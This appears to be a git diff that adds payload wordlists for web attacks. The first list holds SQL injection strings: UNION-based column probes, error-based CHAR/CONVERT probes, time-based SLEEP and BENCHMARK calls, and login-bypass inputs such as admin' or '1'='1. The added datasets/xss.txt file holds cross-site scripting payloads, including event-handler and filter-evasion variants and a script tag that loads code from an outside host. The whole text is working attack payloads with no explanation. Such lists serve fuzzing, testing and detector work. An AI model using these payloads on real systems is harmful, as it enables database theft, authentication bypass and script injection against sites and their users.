SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + UNION ALL SELECT NULL-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- + UNION ALL SELECT NULL# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))# + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))# + UNION ALL SELECT NULL + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107))) + AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) + AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) + AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC) + AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX' + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 + UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- + UNION ALL SELECT 'INJ'||'ECT'||'XXX'# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# + UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 + diff --git a/datasets/xss.txt b/datasets/xss.txt new file mode 100644 index 0000000..49ac3a4 --- /dev/null +++ b/datasets/xss.txt @@ -0,0 +1,6613 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y +<image/src/onerror=prompt(8)> +<img/src/onerror=prompt(8)> +<image src/onerror=prompt(8)> +<img src/onerror=prompt(8)> +<image src =q onerror=prompt(8)> +<img src =q onerror=prompt(8)> +</scrip</script>t><img src =q onerror=prompt(8)> +<svg onload=alert(1)> +"><svg onload=alert(1)// +"onmouseover=alert(1)// +"autofocus/onfocus=alert(1)// +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! +<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! +<script>alert(1)// +<script>alert(1)<!– +<script src=//brutelogic.com.br/1.js> +<script src=//3334957647/1> +%3Cx onxxx=alert(1) +<%78 onxxx=1 +<x %6Fnxxx=1 +<x o%6Exxx=1 +<x on%78xx=1 +<x onxxx%3D1 +<X onxxx=1 +<x OnXxx=1 +<X OnXxx=1 +<x onxxx=1 onxxx=1 +<x/onxxx=1 +<x%09onxxx=1 +<x%0Aonxxx=1 +<x%0Conxxx=1 +<x%0Donxxx=1 